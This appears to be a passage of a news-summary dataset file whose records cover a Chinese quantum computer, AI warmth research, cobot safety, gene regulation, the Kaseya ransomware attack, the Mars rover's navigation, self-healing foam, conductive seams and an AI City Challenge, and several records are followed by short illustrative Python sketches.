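SECRET_KEY = os.environ.get("ACH_TOKEN_KEY", "change-me").encode()

def truncate(account_number):
    # Keep only the last four digits for storage or display.
    return "*" * (len(account_number) - 4) + account_number[-4:]

def tokenize(account_number):
    # Deterministic keyed token; the clear account number itself is never stored.
    return hmac.new(SECRET_KEY, account_number.encode(), hashlib.sha256).hexdigest()

stored_record = {"last4": truncate("123456789012"), "token": tokenize("123456789012")}
print(stored_record)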
160
China Beats Google to Claim the World's Most Powerful Quantum Computer
By Matthew Sparkes The Zuchongzhi quantum computer University of Science and Technology of China/quantumcomputer.ac.cn A team in China has demonstrated that it has the world's most powerful quantum computer, leapfrogging the previous record holder, Google. Jian-Wei Pan at the University of Science and Technology of China in Hefei and his colleagues say their quantum computer has solved a problem in just over an hour that would take the world's most powerful classical supercomputer eight years to crack, and may yet be capable of exponentially higher performance. The problem, which has become a benchmark in quantum computing , involves simulating a quantum ...
Chinese researchers have demonstrated the world's most powerful quantum computer, displacing Google's Sycamore processor as the holder of quantum supremacy. The 54-quantum-bit (qubit) Sycamore solved the benchmark problem of simulating a quantum circuit and sampling random numbers from its output in three minutes 20 seconds; the Google team said the most powerful classical supercomputer would have taken 10,000 years to crack the problem. The Chinese team's Zuchongzhi processor featured 66 qubits, although the team reportedly used just 56 to solve the same challenge in about 70 minutes. Peter Knight at the U.K.'s Imperial College London said, "What this has done is really demonstrate what we've always thought we knew, but didn't have proved experimentally, that you can always beat a classical machine by adding a few more qubits."
[]
[]
[]
scitechnews
None
None
None
None
Chinese researchers have demonstrated the world's most powerful quantum computer, displacing Google's Sycamore processor as the holder of quantum supremacy. The 54-quantum-bit (qubit) Sycamore solved the benchmark problem of simulating a quantum circuit and sampling random numbers from its output in three minutes 20 seconds; the Google team said the most powerful classical supercomputer would have taken 10,000 years to crack the problem. The Chinese team's Zuchongzhi processor featured 66 qubits, although the team reportedly used just 56 to solve the same challenge in about 70 minutes. Peter Knight at the U.K.'s Imperial College London said, "What this has done is really demonstrate what we've always thought we knew, but didn't have proved experimentally, that you can always beat a classical machine by adding a few more qubits." By Matthew Sparkes The Zuchongzhi quantum computer University of Science and Technology of China/quantumcomputer.ac.cn A team in China has demonstrated that it has the world's most powerful quantum computer, leapfrogging the previous record holder, Google. Jian-Wei Pan at the University of Science and Technology of China in Hefei and his colleagues say their quantum computer has solved a problem in just over an hour that would take the world's most powerful classical supercomputer eight years to crack, and may yet be capable of exponentially higher performance. The problem, which has become a benchmark in quantum computing , involves simulating a quantum ...
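The benchmark behind both claims, sampling bitstrings from the output of a random quantum circuit, can be illustrated with a brute-force classical simulation. The toy Python sketch below is not the Zuchongzhi or Sycamore circuit; it builds a Haar-random unitary, applies it to the all-zeros state, and samples from the resulting distribution, which makes visible why memory and time grow as 2^n in the number of qubits n for this state-vector approach.

import numpy as np

def haar_random_unitary(dim, rng):
    # Haar-distributed unitary from the QR decomposition of a complex Gaussian matrix.
    z = (rng.standard_normal((dim, dim)) + 1j * rng.standard_normal((dim, dim))) / np.sqrt(2)
    q, r = np.linalg.qr(z)
    phases = np.diag(r) / np.abs(np.diag(r))
    return q * phases  # rescale columns so the distribution is uniform (Haar)

rng = np.random.default_rng(0)
for n_qubits in (4, 8, 10):
    dim = 2 ** n_qubits
    state = haar_random_unitary(dim, rng)[:, 0]      # "circuit" applied to |00...0>
    probs = np.abs(state) ** 2
    probs = probs / probs.sum()                      # guard against floating-point drift
    samples = rng.choice(dim, size=5, p=probs)       # the bitstring-sampling step
    print(f"{n_qubits:>2} qubits: {dim} amplitudes to track; sampled bitstrings {samples}")
# A full state vector for 56 qubits would hold 2**56 complex amplitudes, roughly an
# exabyte at double precision, which is why a few extra qubits push this brute-force
# approach out of reach of classical machines (more sophisticated classical methods
# exist, but they also scale badly with circuit size).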
161
Technion Study Finds Warmth of AI Systems More Important Than Capability
A study by researchers at the Technion - Israel Institute of Technology found that potential users of artificial intelligence (AI) systems consider such systems' "warmth" more important than capability and competence. The study of more than 1,600 participants defined warmth as related to traits indicating the AI system's perceived intent, such as friendliness, helpfulness, sincerity, trustworthiness, and morality. The researchers found participants preferred "warm" AI systems built for the consumer that use algorithms trained on less data over systems built for the producer that use state-of-the-art artificial neural network algorithms. The researchers looked at navigation apps, search engines, and recommender systems, in contrast to prior research that focused on virtual agents or robots.
[]
[]
[]
scitechnews
None
None
None
None
A study by researchers at the Technion - Israel Institute of Technology found that potential users of artificial intelligence (AI) systems consider such systems' "warmth" more important than capability and competence. The study of more than 1,600 participants defined warmth as related to traits indicating the AI system's perceived intent, such as friendliness, helpfulness, sincerity, trustworthiness, and morality. The researchers found participants preferred "warm" AI systems built for the consumer that use algorithms trained on less data over systems built for the producer that use state-of-the-art artificial neural network algorithms. The researchers looked at navigation apps, search engines, and recommender systems, in contrast to prior research that focused on virtual agents or robots.
162
Web-Based Design Tool for Better Job Safety
A free Web-based tool developed by Germany's Fraunhofer Institute for Factory Operation and Automation IFF aims to help companies design cobots, or robots that work alongside humans, to reduce the risk of accidents and increase employee safety. The Cobot Designer, which runs on all browsers, can be used by companies before purchasing a robot to determine whether its speed will allow a task to be performed productively and safely. Users enter the robot's parameters, the hazard, and the tool to be used, and the Cobot Designer will calculate the effect of contact between a human and the robot, and the robot's maximum permissible speed. Fraunhofer's Roland Behrens said, "The goal is to use computer simulation, as the Cobot Designer does, to dispense with measurements entirely in the future."
[]
[]
[]
scitechnews
None
None
None
None
A free Web-based tool developed by Germany's Fraunhofer Institute for Factory Operation and Automation IFF aims to help companies design cobots, or robots that work alongside humans, to reduce the risk of accidents and increase employee safety. The Cobot Designer, which runs on all browsers, can be used by companies before purchasing a robot to determine whether its speed will allow a task to be performed productively and safely. Users enter the robot's parameters, the hazard, and the tool to be used, and the Cobot Designer will calculate the effect of contact between a human and the robot, and the robot's maximum permissible speed. Fraunhofer's Roland Behrens said, "The goal is to use computer simulation, as the Cobot Designer does, to dispense with measurements entirely in the future."
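The Cobot Designer's internal models are not detailed in the article, so the Python sketch below should be read only as an illustration of the kind of energy-balance estimate used for power- and force-limited collaboration, in the spirit of ISO/TS 15066: a transient contact is modelled as a spring, and the maximum permissible relative speed follows from the allowed contact force, the contact stiffness, and the reduced mass of robot and body region. All numeric values are placeholders, not limits from the standard or from Fraunhofer's tool.

import math

def reduced_mass(robot_effective_mass_kg, body_region_mass_kg):
    # Two-body reduced mass used for transient (dynamic) contact.
    return 1.0 / (1.0 / robot_effective_mass_kg + 1.0 / body_region_mass_kg)

def max_relative_speed(f_max_n, stiffness_n_per_m, mu_kg):
    # Spring model: energy at peak force F^2 / (2k) equals kinetic energy 0.5 * mu * v^2,
    # so v_max = F_max / sqrt(mu * k).
    return f_max_n / math.sqrt(mu_kg * stiffness_n_per_m)

# Placeholder numbers for a hand-contact scenario (illustrative only).
mu = reduced_mass(robot_effective_mass_kg=12.0, body_region_mass_kg=0.6)
v_max = max_relative_speed(f_max_n=140.0, stiffness_n_per_m=75_000.0, mu_kg=mu)
print(f"maximum permissible relative speed for this scenario: {v_max:.2f} m/s")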
163
ML Algorithm Predicts How Genes Are Regulated in Individual Cells
A team of scientists at the University of Illinois Chicago has developed a software tool that can help researchers more efficiently identify the regulators of genes. The system leverages a machine learning algorithm to predict which transcription factors are most likely to be active in individual cells. Transcription factors are proteins that bind to DNA and control what genes are turned "on" or "off" inside a cell. These proteins are relevant to biomedical researchers because understanding and manipulating these signals in the cell can be an effective way to discover new treatments for some illnesses. However, there are hundreds of transcription factors inside human cells and it can take years of research, often through trial and error, to identify which are most active - those that are expressed, or "on" - in different types of cells and which could be leveraged as drug targets. "One of the challenges in the field is that the same genes may be turned "on" in one group of cells but turned "off" in a different group of cells within the same organ," said Jalees Rehman, UIC professor in the department of medicine and the department of pharmacology and regenerative medicine at the College of Medicine. "Being able to understand the activity of transcription factors in individual cells would allow researchers to study activity profiles in all the major cell types of major organs such as the heart, brain or lungs." Named BITFAM, for Bayesian Inference Transcription Factor Activity Model, the UIC-developed system works by combining new gene expression profile data gathered from single cell RNA sequencing with existing biological data on transcription factor target genes. With this information, the system runs numerous computer-based simulations to find the optimal fit and predict the activity of each transcription factor in the cell. The UIC researchers, co-led by Rehman and Yang Dai, UIC associate professor in the department of bioengineering at the College of Medicine and the College of Engineering, tested the system in cells from lung, heart and brain tissue. Information on the model and the results of their tests are reported today in the journal Genome Research . "Our approach not only identifies meaningful transcription factor activities but also provides valuable insights into underlying transcription factor regulatory mechanisms," said Shang Gao, first author of the study and a doctoral student in the department of bioengineering. "For example, if 80% of a specific transcription factor's targets are turned on inside the cell, that tells us that its activity is high. By providing data like this for every transcription factor in the cell, the model can give researchers a good idea of which ones to look at first when exploring new drug targets to work on that type of cell." The researchers say that the new system is publicly available and could be applied widely because users have the flexibility to combine it with additional analysis methods that may be best suited for their studies, such as finding new drug targets. "This new approach could be used to develop key biological hypotheses regarding the regulatory transcription factors in cells related to a broad range of scientific hypotheses and topics. It will allow us to derive insights into the biological functions of cells from many tissues," Dai said. 
Rehman, whose research focuses on the mechanisms of inflammation in vascular systems, says an application relevant to his lab is to use the new system to focus on the transcription factors that drive diseases in specific cell types. "For example, we would like to understand if there is transcription factor activity that distinguished a healthy immune cell response from an unhealthy one, as in the case of conditions such as COVID-19, heart disease or Alzheimer's disease where there is often an imbalance between healthy and unhealthy immune responses," he said. The studies were supported by grants from the National Institutes of Health (P01HL60678, R01HL154538, R01HL149300, R01HL126516).
A software tool designed by University of Illinois Chicago (UIC) scientists uses a machine learning algorithm to help researchers more efficiently identify genetic regulators. The Bayesian Inference Transcription Factor Activity Model (BITFAM) predicts the transcription factors most likely to be active in individual cells. BITFAM integrates new gene expression profile data collected from single-cell RNA sequencing with current biological data on transcription factor target genes, then runs computer-based models to find the best match and forecast the activity of each transcription factor in the cell. The team tested BITFAM in cells from lung, heart, and brain tissue, and UIC's Shang Gao said the algorithm yields not only significant activities, but also insights into underpinning regulatory mechanisms.
[]
[]
[]
scitechnews
None
None
None
None
A software tool designed by University of Illinois Chicago (UIC) scientists uses a machine learning algorithm to help researchers more efficiently identify genetic regulators. The Bayesian Inference Transcription Factor Activity Model (BITFAM) predicts the transcription factors most likely to be active in individual cells. BITFAM integrates new gene expression profile data collected from single-cell RNA sequencing with current biological data on transcription factor target genes, then runs computer-based models to find the best match and forecast the activity of each transcription factor in the cell. The team tested BITFAM in cells from lung, heart, and brain tissue, and UIC's Shang Gao said the algorithm yields not only significant activities, but also insights into underpinning regulatory mechanisms. A team of scientists at the University of Illinois Chicago has developed a software tool that can help researchers more efficiently identify the regulators of genes. The system leverages a machine learning algorithm to predict which transcription factors are most likely to be active in individual cells. Transcription factors are proteins that bind to DNA and control what genes are turned "on" or "off" inside a cell. These proteins are relevant to biomedical researchers because understanding and manipulating these signals in the cell can be an effective way to discover new treatments for some illnesses. However, there are hundreds of transcription factors inside human cells and it can take years of research, often through trial and error, to identify which are most active - those that are expressed, or "on" - in different types of cells and which could be leveraged as drug targets. "One of the challenges in the field is that the same genes may be turned "on" in one group of cells but turned "off" in a different group of cells within the same organ," said Jalees Rehman, UIC professor in the department of medicine and the department of pharmacology and regenerative medicine at the College of Medicine. "Being able to understand the activity of transcription factors in individual cells would allow researchers to study activity profiles in all the major cell types of major organs such as the heart, brain or lungs." Named BITFAM, for Bayesian Inference Transcription Factor Activity Model, the UIC-developed system works by combining new gene expression profile data gathered from single cell RNA sequencing with existing biological data on transcription factor target genes. With this information, the system runs numerous computer-based simulations to find the optimal fit and predict the activity of each transcription factor in the cell. The UIC researchers, co-led by Rehman and Yang Dai, UIC associate professor in the department of bioengineering at the College of Medicine and the College of Engineering, tested the system in cells from lung, heart and brain tissue. Information on the model and the results of their tests are reported today in the journal Genome Research . "Our approach not only identifies meaningful transcription factor activities but also provides valuable insights into underlying transcription factor regulatory mechanisms," said Shang Gao, first author of the study and a doctoral student in the department of bioengineering. "For example, if 80% of a specific transcription factor's targets are turned on inside the cell, that tells us that its activity is high. 
By providing data like this for every transcription factor in the cell, the model can give researchers a good idea of which ones to look at first when exploring new drug targets to work on that type of cell." The researchers say that the new system is publicly available and could be applied widely because users have the flexibility to combine it with additional analysis methods that may be best suited for their studies, such as finding new drug targets. "This new approach could be used to develop key biological hypotheses regarding the regulatory transcription factors in cells related to a broad range of scientific hypotheses and topics. It will allow us to derive insights into the biological functions of cells from many tissues," Dai said. Rehman, whose research focuses on the mechanisms of inflammation in vascular systems, says an application relevant to his lab is to use the new system to focus on the transcription factors that drive diseases in specific cell types. "For example, we would like to understand if there is transcription factor activity that distinguished a healthy immune cell response from an unhealthy one, as in the case of conditions such as COVID-19, heart disease or Alzheimer's disease where there is often an imbalance between healthy and unhealthy immune responses," he said. The studies were supported by grants from the National Institutes of Health (P01HL60678, R01HL154538, R01HL149300, R01HL126516).
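BITFAM itself is a Bayesian model, described in the Genome Research paper; the Python snippet below is a deliberately simplified, non-Bayesian stand-in meant only to convey the core idea of combining a transcription-factor-to-target prior matrix with observed expression to score per-cell activities. The data are randomly generated toys, and the least-squares solver stands in for the real model's probabilistic inference.

import numpy as np

rng = np.random.default_rng(1)
n_genes, n_tfs, n_cells = 200, 10, 50

# Toy binary prior: which genes are known targets of which transcription factors.
prior = (rng.random((n_genes, n_tfs)) < 0.05).astype(float)
true_activity = rng.random((n_tfs, n_cells))          # hidden per-cell TF activities
expression = prior @ true_activity + 0.1 * rng.standard_normal((n_genes, n_cells))

# Least-squares estimate of activities for all cells at once (stand-in for inference).
estimated, *_ = np.linalg.lstsq(prior, expression, rcond=None)
estimated = np.clip(estimated, 0.0, None)             # activities are non-negative

r = np.corrcoef(true_activity.ravel(), estimated.ravel())[0, 1]
print(f"correlation between simulated and recovered TF activities: {r:.2f}")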
164
Mass Ransomware Hack Used IT Software Flaws, Researchers Say
Cybersecurity researchers said the Russia-associated REvil hacker gang was responsible for a mass ransomware attack this past weekend that exploited previously unknown flaws in Kaseya's information technology (IT) management software. Marcus Murray at Sweden-based cybersecurity firm TruSec said the victims were targets of opportunity, with REvil pushing ransomware to Internet-linked servers that used flawed VSA software. The Dutch Institute for Vulnerability Disclosure said it had notified Kaseya of multiple software vulnerabilities exploited by the hackers; the Institute said it was working with Kaseya to patch them when the attack was launched. Murray said recovery from the attack could take longer than in typical ransomware incidents, because Kaseya plays a core role in managing security and IT.
[]
[]
[]
scitechnews
None
None
None
None
Cybersecurity researchers said the Russia-associated REvil hacker gang was responsible for a mass ransomware attack this past weekend that exploited previously unknown flaws in Kaseya's information technology (IT) management software. Marcus Murray at Sweden-based cybersecurity firm TruSec said the victims were targets of opportunity, with REvil pushing ransomware to Internet-linked servers that used flawed VSA software. The Dutch Institute for Vulnerability Disclosure said it had notified Kaseya of multiple software vulnerabilities exploited by the hackers; the Institute said it was working with Kaseya to patch them when the attack was launched. Murray said recovery from the attack could take longer than in typical ransomware incidents, because Kaseya plays a core role in managing security and IT.
165
NASA's Self-Driving Perseverance Mars Rover 'Takes the Wheel'
The National Aeronautics and Space Administration (NASA) Jet Propulsion Laboratory (JPL) has developed an auto-navigation system that will allow the Perseverance rover on Mars to drive by itself. The AutoNav system can create three-dimensional maps of terrain ahead and plan a route around any hazards it identifies without additional input from the rover team on Earth. JPL's Vandi Verma said, "We have a capability called 'thinking while driving.' The rover is thinking about the autonomous drive while its wheels are turning." AutoNav and other improvements could boost Perseverance's top speed to 393 feet per hour, compared to 66 feet per hour for its Curiosity predecessor.
[]
[]
[]
scitechnews
None
None
None
None
The National Aeronautics and Space Administration (NASA) Jet Propulsion Laboratory (JPL) has developed an auto-navigation system that will allow the Perseverance rover on Mars to drive by itself. The AutoNav system can create three-dimensional maps of terrain ahead and plan a route around any hazards it identifies without additional input from the rover team on Earth. JPL's Vandi Verma said, "We have a capability called 'thinking while driving.' The rover is thinking about the autonomous drive while its wheels are turning." AutoNav and other improvements could boost Perseverance's top speed to 393 feet per hour, compared to 66 feet per hour for its Curiosity predecessor.
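JPL has not published AutoNav's planning code in this article, so the following Python sketch is only a generic illustration of the two steps described, building a hazard map over a terrain grid and planning a route around the flagged cells, here with a plain breadth-first search on a small synthetic map.

from collections import deque

# 0 = traversable terrain, 1 = hazard (e.g., a rock or sand trap) in a toy map.
hazard_map = [
    [0, 0, 0, 0, 0],
    [0, 1, 1, 1, 0],
    [0, 0, 0, 1, 0],
    [1, 1, 0, 1, 0],
    [0, 0, 0, 0, 0],
]

def plan_route(start, goal, grid):
    # Breadth-first search over safe cells; returns the list of cells or None.
    rows, cols = len(grid), len(grid[0])
    queue, came_from = deque([start]), {start: None}
    while queue:
        cell = queue.popleft()
        if cell == goal:
            path = []
            while cell is not None:
                path.append(cell)
                cell = came_from[cell]
            return path[::-1]
        r, c = cell
        for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if (0 <= nr < rows and 0 <= nc < cols
                    and grid[nr][nc] == 0 and (nr, nc) not in came_from):
                came_from[(nr, nc)] = cell
                queue.append((nr, nc))
    return None  # no hazard-free route exists

print(plan_route((0, 0), (4, 4), hazard_map))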
166
Smart Foam Material Gives Robotic Hand the Ability to Self-Repair
SINGAPORE, July 6 (Reuters) - Singapore researchers have developed a smart foam material that allows robots to sense nearby objects, and repairs itself when damaged, just like human skin. Artificially innervated foam, or AiFoam, is a highly elastic polymer created by mixing fluoropolymer with a compound that lowers surface tension. This allows the spongy material to fuse easily into one piece when cut, according to the researchers at the National University of Singapore. "There are many applications for such a material, especially in robotics and prosthetic devices, where robots need to be a lot more intelligent when working around humans," explained lead researcher Benjamin Tee. To replicate the human sense of touch, the researchers infused the material with microscopic metal particles and added tiny electrodes underneath the surface of the foam. When pressure is applied, the metal particles draw closer within the polymer matrix, changing their electrical properties. These changes can be detected by the electrodes connected to a computer, which then tells the robot what to do, Tee said. "When I move my finger near the sensor, you can see the sensor is measuring the changes of my electrical field and responds accordingly to my touch," he said. This feature enables the robotic hand to detect not only the amount but also the direction of applied force, potentially making robots more intelligent and interactive. Tee said AiFoam is the first of its kind to combine both self-healing properties and proximity and pressure sensing. After spending over two years developing it, he and his team hope the material can be put to practical use within five years. "It can also allow prosthetic users to have more intuitive use of their robotic arms when grabbing objects," he said.
Scientists at the National University of Singapore (NUS) have engineered artificially innervated foam (AiFoam) that enables robots to both sense nearby objects and to repair themselves when damaged. The researchers blended a highly elastic fluoropolymer with a compound that reduces surface tension, allowing the material to fuse easily when cut. Microscopic metal particles and electrodes implanted beneath the foam's surface replicate the human sense of touch; NUS' Benjamin Tee said pressure causes the particles to draw closer within the polymer matrix, altering their electrical properties in a manner detectable by computer-linked electrodes, which then instruct the robot. The robotic hand can detect the amount and the direction of force applied to it, potentially enhancing robot intelligence and interactivity.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the National University of Singapore (NUS) have engineered artificially innervated foam (AiFoam) that enables robots to both sense nearby objects and to repair themselves when damaged. The researchers blended a highly elastic fluoropolymer with a compound that reduces surface tension, allowing the material to fuse easily when cut. Microscopic metal particles and electrodes implanted beneath the foam's surface replicate the human sense of touch; NUS' Benjamin Tee said pressure causes the particles to draw closer within the polymer matrix, altering their electrical properties in a manner detectable by computer-linked electrodes, which then instruct the robot. The robotic hand can detect the amount and the direction of force applied to it, potentially enhancing robot intelligence and interactivity. SINGAPORE, July 6 (Reuters) - Singapore researchers have developed a smart foam material that allows robots to sense nearby objects, and repairs itself when damaged, just like human skin. Artificially innervated foam, or AiFoam, is a highly elastic polymer created by mixing fluoropolymer with a compound that lowers surface tension. This allows the spongy material to fuse easily into one piece when cut, according to the researchers at the National University of Singapore. "There are many applications for such a material, especially in robotics and prosthetic devices, where robots need to be a lot more intelligent when working around humans," explained lead researcher Benjamin Tee. To replicate the human sense of touch, the researchers infused the material with microscopic metal particles and added tiny electrodes underneath the surface of the foam. When pressure is applied, the metal particles draw closer within the polymer matrix, changing their electrical properties. These changes can be detected by the electrodes connected to a computer, which then tells the robot what to do, Tee said. "When I move my finger near the sensor, you can see the sensor is measuring the changes of my electrical field and responds accordingly to my touch," he said. This feature enables the robotic hand to detect not only the amount but also the direction of applied force, potentially making robots more intelligent and interactive. Tee said AiFoam is the first of its kind to combine both self-healing properties and proximity and pressure sensing. After spending over two years developing it, he and his team hope the material can be put to practical use within five years. "It can also allow prosthetic users to have more intuitive use of their robotic arms when grabbing objects," he said.
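The NUS team's signal-processing code is not given here; as a loose illustration of the sensing idea in the article, the toy Python sketch below takes changes in readings from an assumed grid of electrodes under the foam and derives a rough force magnitude, a contact position, and a direction of movement from a weighted centroid. The grid size, units, and baseline values are invented for the example.

import numpy as np

# Changes in electrode readings (arbitrary units) relative to the unpressed baseline
# for an assumed 4x4 electrode grid; larger values mean stronger local deformation.
delta = np.array([
    [0.0, 0.1, 0.0, 0.0],
    [0.1, 0.8, 0.4, 0.0],
    [0.0, 0.5, 0.3, 0.0],
    [0.0, 0.0, 0.0, 0.0],
])

total = delta.sum()                                   # crude proxy for force magnitude
rows, cols = np.indices(delta.shape)
centroid = (float((rows * delta).sum() / total), float((cols * delta).sum() / total))

previous_centroid = (1.0, 1.0)                        # centroid from the previous sample
direction = (centroid[0] - previous_centroid[0], centroid[1] - previous_centroid[1])

print(f"force magnitude proxy: {total:.2f}")
print(f"contact centroid (row, col): ({centroid[0]:.2f}, {centroid[1]:.2f})")
print(f"shift since last sample: ({direction[0]:+.2f}, {direction[1]:+.2f})")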
167
Scientists Mine the Rich Seam of Body Wearable Motion Sensors
When positioned strategically, garment seams sewn with conductive yarn can be used to accurately track body motion, according to computer scientists at the University of Bath. Best of all, these charged seams are able to respond to subtle movements that aren't picked up by popular fitness trackers, such as watches and wristbands. In a new study, the Bath researchers found that clothing made with conductive seams can be analysed to identify the wearer's movements. Engineering Doctorate (EngD) student Olivia Ruston , who presented the work at the ACM Designing Interactive Systems conference this month, said: "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." Groups of scientists have been creating flexible, textile sensors for garments for some time, but the Bath project is the first where researchers have experimented with the location and concentration of conductive seams. They found that where seams are placed on a garment, and the number of seams that are added, are important considerations in the design of a movement-tracking smart garment. Ms Ruston, who is based at the Centre for Digital Entertainment (CDE) - an EPSRC-funded doctoral training centre - said: "There's great potential to exploit the wearing of clothing and tech - a lot of people are experimenting with e-textiles, but we don't have a coherent understanding between technologists and fashion designers, and we need to link these groups up so we can come up with the best ideas for embedding tech into clothing." The yarn used by Ms Ruston and her team comprises a conductive core that is a hybrid metal-polymer resistive material intended for stretch and pressure sensing. Once incorporated into a garment's seam, it is activated at low voltages. The resistance fluctuates as body movement varies the tension across the seams. In the study, the seams were connected to a microcontroller, and then a computer, where the voltage signal was recorded. Professor Mike Fraser , co-author and head of Computer Science, said: "Our work provides implications for sensing-driven clothing design. As opportunities for novel clothing functionality emerge, we believe intelligent seam placement will play a key role in influencing design and manufacturing processes. Ultimately, this could influence what is considered fashionable."
Computer scientists at the University of Bath in the U.K. found that conductive seams in clothing, when accurately positioned, can be used to identify subtle movements by the wearer that are not picked up by fitness watches and wristbands. The researchers found that the number of seams and their placement are important in designing smart garments. They used a yarn with a conductive core made from a hybrid metal-polymer resistive material that stretches, can sense pressure, and may be activated at low voltages when added to a seam. Bath's Olivia Ruston said, "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance."
[]
[]
[]
scitechnews
None
None
None
None
Computer scientists at the University of Bath in the U.K. found that conductive seams in clothing, when accurately positioned, can be used to identify subtle movements by the wearer that are not picked up by fitness watches and wristbands. The researchers found that the number of seams and their placement are important in designing smart garments. They used a yarn with a conductive core made from a hybrid metal-polymer resistive material that stretches, can sense pressure, and may be activated at low voltages when added to a seam. Bath's Olivia Ruston said, "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." When positioned strategically, garment seams sewn with conductive yarn can be used to accurately track body motion, according to computer scientists at the University of Bath. Best of all, these charged seams are able to respond to subtle movements that aren't picked up by popular fitness trackers, such as watches and wristbands. In a new study, the Bath researchers found that clothing made with conductive seams can be analysed to identify the wearer's movements. Engineering Doctorate (EngD) student Olivia Ruston , who presented the work at the ACM Designing Interactive Systems conference this month, said: "There are lots of potential applications for conductive yarn in any activity where you want to identify and improve the quality of a person's movement. This could be very helpful in physiotherapy, rehabilitation, and sports performance." Groups of scientists have been creating flexible, textile sensors for garments for some time, but the Bath project is the first where researchers have experimented with the location and concentration of conductive seams. They found that where seams are placed on a garment, and the number of seams that are added, are important considerations in the design of a movement-tracking smart garment. Ms Ruston, who is based at the Centre for Digital Entertainment (CDE) - an EPSRC-funded doctoral training centre - said: "There's great potential to exploit the wearing of clothing and tech - a lot of people are experimenting with e-textiles, but we don't have a coherent understanding between technologists and fashion designers, and we need to link these groups up so we can come up with the best ideas for embedding tech into clothing." The yarn used by Ms Ruston and her team comprises a conductive core that is a hybrid metal-polymer resistive material intended for stretch and pressure sensing. Once incorporated into a garment's seam, it is activated at low voltages. The resistance fluctuates as body movement varies the tension across the seams. In the study, the seams were connected to a microcontroller, and then a computer, where the voltage signal was recorded. Professor Mike Fraser , co-author and head of Computer Science, said: "Our work provides implications for sensing-driven clothing design. As opportunities for novel clothing functionality emerge, we believe intelligent seam placement will play a key role in influencing design and manufacturing processes. Ultimately, this could influence what is considered fashionable."
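The study records the seam signal through a microcontroller; as a hedged illustration of that step, the Python sketch below converts raw ADC counts from an assumed voltage-divider circuit into seam resistance and flags movement when the value departs from a resting baseline. The supply voltage, ADC resolution, reference resistor, and threshold are assumptions for the example, not values from the Bath paper.

# Illustrative conversion of ADC readings from a conductive seam (assumed circuit).
VCC = 3.3                 # volts, assumed supply
ADC_MAX = 4095            # 12-bit converter, assumed
R_REF = 10_000.0          # ohms, assumed fixed divider resistor

def seam_resistance(adc_counts):
    # Divider: Vout = Vcc * R_seam / (R_ref + R_seam)  =>  R_seam = R_ref * Vout / (Vcc - Vout)
    v_out = VCC * adc_counts / ADC_MAX
    return R_REF * v_out / (VCC - v_out)

baseline = seam_resistance(1800)                      # reading in a resting posture
for counts in (1805, 1950, 2300, 1820):               # samples while the wearer moves
    r = seam_resistance(counts)
    moving = abs(r - baseline) / baseline > 0.05      # 5% change threshold, assumed
    print(f"ADC={counts}  R_seam={r:8.0f} ohm  movement detected: {moving}")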
168
Global Smart-City Competition Highlights China's Rise in AI
Four years ago, organizers created the international AI City Challenge to spur the development of artificial intelligence for real-world scenarios like counting cars traveling through intersections or spotting accidents on freeways. In the first years, teams representing American companies or universities took top spots in the competition. Last year, Chinese companies won three out of four competitions. Last week, Chinese tech giants Alibaba and Baidu swept the AI City Challenge, beating competitors from nearly 40 nations. Chinese companies or universities took first and second place in all five categories. TikTok creator ByteDance took second place in a competition to identify car accidents or stalled vehicles from freeway videofeeds. The results reflect years of investment by the Chinese government in smart cities. Hundreds of Chinese cities have pilot programs, and by some estimates, China has half of the world's smart cities. The spread of edge computing, cameras, and sensors using 5G wireless connections is expected to accelerate use of smart-city and surveillance technology. The tech displayed in these competitions can be useful to city planners, but it also can facilitate invasive surveillance. Counting the number of cars on the road helps civic engineers understand the resources required to support roads and bridges, but tracking a vehicle across multiple live camera feeds is a powerful form of surveillance. One of the competitions in the AI City Challenge asked participants to identify cars in videofeeds; for the first time this year, the descriptions were in ordinary language, such as "a blue Jeep goes straight down a winding road behind a red pickup truck." The competition comes at a time of increased tech nationalism and tension between the US and China , and growing concern over the powers of AI. The Carnegie Endowment for International Peace in 2019 called China "a major driver of AI surveillance worldwide." The group said China and the US were the two leading exporters of the technology. Last month, the Biden administration expanded a blacklist started by the Trump administration to nearly 60 Chinese companies barred from receiving investment from US financiers. Also in recent weeks, the US Senate passed the Competition and Innovation Act , providing billions in investment for chips, AI, and supply chain reliability. It also calls for investment in smart cities, including expanding a smart-city partnership with southeast Asian nations (excluding China). China's domination of the smart-city challenge may come with an asterisk. John Garofolo, a US government official involved in the competition, says he noticed fewer US teams this year. Organizers say they don't track participants by country. Stan Caldwell is executive director of Mobility21, a project at Carnegie Mellon University assisting smart-city development in Pittsburgh. Caldwell laments that China invests twice as much as the US in research and development as a share of GDP, which he calls key to staying competitive in areas of emerging technology. He says AI researchers in the US can also compete for government grants like the National Science Foundation's Civic Innovation Challenge or the Department of Transportation's Smart City Challenge. A report released last month found that a $50 million DOT grant to the city of Columbus, Ohio, never quite delivered on the promise of building the smart city of the future. "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. 
But selfishly, we also want this technology to develop here and improve our economy," Caldwell says. Spokespeople for Alibaba and Baidu declined to comment, but advances from smart-city challenges can help fuel commercial offerings for both companies. Alibaba's City Brain tracks more than 1,000 traffic lights in the company's hometown of Hangzhou, a city of 10 million people. A pilot program found that City Brain reduced congestion and helped clear the way for emergency responders.
Chinese tech giants Alibaba and Baidu took first and second place in all five categories in the recent AI City Challenge, outperforming competitors from almost 40 countries. Carnegie Mellon University's Stan Caldwell points out that China invests twice as much as the U.S. in research and development as a share of gross domestic product. Caldwell said, "We want the technologies to develop, because we want to improve safety and efficiency and sustainability. But selfishly, we also want this technology to develop here and improve our economy." The U.S. National Institute for Standards and Technology is calling on American artificial intelligence (AI) researchers to participate in its Automated Streams Analysis for Public Safety (ASAPS) Challenge Program, which aims to develop AI to help emergency operators predict when their services will be needed.
[]
[]
[]
scitechnews
None
None
None
None
